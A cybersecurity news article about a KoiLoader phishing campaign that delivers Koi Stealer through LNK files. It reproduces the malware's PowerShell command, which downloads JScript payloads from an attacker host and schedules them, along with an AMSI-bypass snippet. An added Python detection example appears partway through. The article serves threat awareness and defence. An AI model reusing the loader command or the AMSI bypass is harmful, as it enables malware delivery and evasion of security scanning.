New KoiLoader Abuses Powershell Scripts to Deliver Malicious Payload

Cybersecurity researchers identified a sophisticated malware campaign leveraging a new variant of KoiLoader, a modular payload delivery system notorious for distributing information stealers like Koi Stealer.

This updated strain employs PowerShell scripts embedded within Windows shortcut (LNK) files to bypass traditional detection mechanisms, demonstrating a concerning evolution in attack methodologies.

The campaign’s initial access vector involves phishing emails impersonating financial institutions, luring victims with ZIP archives containing malicious LNK files labeled as bank statements.


These files exploit a known Windows vulnerability (ZDI-CAN-25373) to hide command-line arguments, masking their malicious intent during superficial inspection.

eSentire’s Threat Response Unit (TRU) first detected the intrusion during routine threat-hunting operations, observing the malware’s multi-stage deployment chain designed to evade endpoint detection and response (EDR) tools.

The attack begins with a PowerShell command embedded in the LNK file, which downloads two JScript payloads (g1siy9wuiiyxnk.js and i7z1x5npc.js) to establish persistence and execute further malicious activities.

Notably, the threat actors employed scheduled tasks to maintain execution continuity while altering process parentage to mimic legitimate system activity.

Scheduled task (Source – eSentire)

The malware’s impact extends beyond initial compromise, as KoiLoader facilitates the delivery of Koi Stealer, a C#-based information stealer capable of harvesting credentials, cryptocurrency wallets, and sensitive documents.

Subsequent command-and-control (C2) communications use encrypted HTTP POST requests to exfiltrate victim data, including operating system details, usernames, and domain information.

This campaign shows the growing reliance on living-off-the-land binaries (LOLBins) and script-based attacks to circumvent security controls.

Infection Mechanism: PowerShell and Obfuscated Script Chaining

The infection chain begins when a victim opens the LNK file chase_statement_march.lnk, which triggers a PowerShell command whose arguments appear truncated when the shortcut is inspected.

Infection Chain (Source – eSentire)

Full analysis revealed that the command downloads two JScript files to %ProgramData%, as shown below:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command $pdw = $env:programdata + '\' + ('g1siy9wuiiyxnk.js i7z1x5npc'); $getf='Dow'+'nl'+'oadF'+'ile'; $w2al9zb7lb86ccs0 = New-Object Net.WebClient; $wscs = 'wscript '; $w2al9zb7lb86ccs0.$getf('https://casettalecese[.]it/.../hemigastrectomySDur.php', 'g1siy9wuiiyxnk.js'); . ('curl.exe') -s -o 76mk0ik748fo 'https://casettalecese[.]it/.../bivalviaGrr.php'; mv 76mk0ik748fo 'i7z1x5npc.js'; . ('sc'+'hta'+'s'+'ks') /create /sc minute /mo 1 /f /tr ("wscript C:\ProgramData\g1siy9wuiiyxnk.js i7z1x5npc") /tn i7z1x5npc;

The first JScript (g1siy9wuiiyxnk.js) deletes the initial scheduled task and relaunches the payload via wscript.exe under svchost.exe to simulate benign activity.

eSentire analysts noted this technique disrupts process ancestry-based detection, as security tools typically associate wscript.exe with user-initiated actions rather than system services.
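To illustrate how the behaviours described above (token-splitting obfuscation in the PowerShell command, a one-minute schtasks entry launching wscript, and wscript.exe running a .js from ProgramData under svchost.exe) can be caught in process-creation telemetry, here is an added detection example. It is not code from the article or from eSentire; the events are constructed to mimic the chain, and the URL is a placeholder.

```python
import re

# Constructed Sysmon-style process-creation events (not real telemetry).
SAMPLE_EVENTS = [
    {   # mimics the LNK-launched PowerShell stage; URL is a placeholder
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "parent_image": r"C:\Windows\explorer.exe",
        "command_line": (
            r"powershell.exe -command $getf='Dow'+'nl'+'oadF'+'ile'; "
            r"$w = New-Object Net.WebClient; $w.$getf('https://example.invalid/a.php', 'g1siy9wuiiyxnk.js'); "
            r". ('sc'+'hta'+'s'+'ks') /create /sc minute /mo 1 /f "
            r'/tr ("wscript C:\ProgramData\g1siy9wuiiyxnk.js i7z1x5npc") /tn i7z1x5npc;'
        ),
    },
    {   # mimics the JScript being relaunched under svchost.exe
        "image": r"C:\Windows\System32\wscript.exe",
        "parent_image": r"C:\Windows\System32\svchost.exe",
        "command_line": r"wscript C:\ProgramData\g1siy9wuiiyxnk.js i7z1x5npc",
    },
    {   # benign: a user running a script from their own profile
        "image": r"C:\Windows\System32\wscript.exe",
        "parent_image": r"C:\Windows\explorer.exe",
        "command_line": r'wscript "C:\Users\alice\Documents\cleanup.vbs"',
    },
]

CONCAT_RE = re.compile(r"'[^']*'\s*\+\s*'[^']*'")  # 'Dow'+'nl' style token splitting
TASK_RE = re.compile(r"/create\b.*?/sc\s+minute\s+/mo\s+1\b.*?/tr\s+\(?\"?\s*wscript", re.I)
PROGRAMDATA_JS_RE = re.compile(r"\\ProgramData\\[^\s\"']+\.js\b", re.I)

def indicators(event):
    """Return the KoiLoader-style behaviours matched by a single event."""
    image = event["image"].lower()
    parent = event["parent_image"].lower()
    cmd = event["command_line"]
    hits = []
    if image.endswith("powershell.exe"):
        if CONCAT_RE.search(cmd):
            hits.append("powershell: string-concatenation obfuscation")
        if TASK_RE.search(cmd):
            hits.append("powershell: one-minute schtasks launching wscript")
    if image.endswith("wscript.exe"):
        if PROGRAMDATA_JS_RE.search(cmd):
            hits.append("wscript: .js launched from ProgramData")
        if parent.endswith("svchost.exe"):
            hits.append("wscript: spawned by svchost.exe")
    return hits

def triage(events):
    """Map event index -> matched indicators, dropping events with none."""
    return {i: h for i, e in enumerate(events) if (h := indicators(e))}
```

Each rule alone is noisy (admins do schedule scripts from ProgramData), so the point is the combination: two or more hits on one host in a short window is what warrants a closer look.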

The secondary script (i7z1x5npc.js) retrieves the victim’s machine GUID from the registry (HKLM\SOFTWARE\Microsoft\Cryptography\MachineGuid), generates a unique filename, and fetches two PowerShell scripts: one to disable AMSI (boomier10qD0.php) and another (nephralgiaMsy.ps1) to load KoiLoader into memory (Figure 5).

The AMSI bypass uses .NET reflection:

$vl1 = ("L8Ek1EOLdflxxTT2W20qMJ0EsGk12dZO5jxvxTT2W20qMJ0EMRc4Ar2q6SDDxTT2W20qMJ0EVEWXewxquV3axTT2W20qMJ0Eybr4BrPdQsbhxTT2W20qMJ0Ez80MpPbbIoRaxTT2W20qMJ0E1zxbk5cQzLZ9xTT2W20qMJ0E8MOQx7eVpj7ZxTT2W20qMJ0EibyPDx89MPoi" -match "xTT2W20qMJ0E")
$v2=$c.GetFields("NonPublic,Static")
Foreach($v3 in $v2) {if ($v3.Name -like "*am*ed") {$v3.SetValue($null, $vl1)}}

KoiLoader’s shellcode then decrypts and executes the final payload using XOR keys retrieved from embedded resources.

Researchers highlight its use of API hashing—a custom algorithm to resolve critical functions like FindResourceW and LoadResource—to hinder static analysis.

This multi-stage approach highlights adversaries’ increasing sophistication in blending LOLBin abuse, script obfuscation, and encryption to evade detection.

Organizations are advised to disable wscript.exe via AppLocker, monitor PowerShell execution logs, and deploy behavior-based EDR solutions to mitigate such threats.


Tushar Subhra Dutta
Tushar is a Cyber security content editor with a passion for creating captivating and informative content. With years of experience under his belt in Cyber Security, he is covering Cyber Security News, technology and other news.